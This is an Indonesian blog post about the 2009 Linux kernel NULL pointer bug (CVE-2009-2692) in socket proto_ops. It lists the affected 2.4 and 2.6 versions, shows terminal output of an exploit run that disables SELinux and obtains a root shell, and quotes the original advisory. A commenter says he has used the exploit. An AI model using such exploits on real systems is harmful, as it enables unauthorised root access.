Bug kernel linux (2009)

Ditemukan bug di kernel linux yang cukup serius, penyebabnya NULL pointer. Kalau di-exploit bisa sampai dapet root...  osram........  The system would do anything for you..

Hampir semua kernel dari versi 2.4 sampai 2.6 terkena bug ini:
- Linux 2.4, from 2.4.4 up to and including 2.4.37.4
- Linux 2.6, from 2.6.0 up to and including 2.6.30.4

exploit testing:

$ ./script
[+] MAPPED ZERO PAGE!
[+] Resolved selinux_enforcing to 0xffffffff80bb4348
[+] Resolved selinux_enabled to 0xffffffff80bb4344
[+] Resolved security_ops to 0xffffffff80bb2ae0
[+] Resolved default_security_ops to 0xffffffff808e55a0
[+] Resolved sel_read_enforce to 0xffffffff803e16e0
[+] Resolved audit_enabled to 0xffffffff80ae2ec4
[+] Resolved commit_creds to 0xffffffff8026d3f0
[+] Resolved prepare_kernel_cred to 0xffffffff8026d040
[+] got ring0!
[+] detected 2.6 style 4k stacks
sh: mplayer: not found
[+] Disabled security of : nothing, what an insecure machine!
[+] Got root!
#
# id
uid=0(root) gid=0(root)
#


Original bug report:

Linux NULL pointer dereference due to incorrect proto_ops initializations
-------------------------------------------------------------------------

In the Linux kernel, each socket has an associated struct of operations
called proto_ops which contain pointers to functions implementing various
features, such as accept, bind, shutdown, and so on.

If an operation on a particular socket is unimplemented, they are expected
to point the associated function pointer to predefined stubs, for example if
the "accept" operation is undefined it would point to sock_no_accept(). However,
we have found that this is not always the case and some of these pointers are
left uninitialized.

-- -- -- --
http://www.cr0.org/misc/CVE-2009-2692.txt

Comments

Computer2 said…
mantab gan... udah kepake tuh di gue buat iseng2

Popular posts from this blog

Tips Jika Mobil Anda Habis Bensin LOL!

Setting open office u label tom & jerry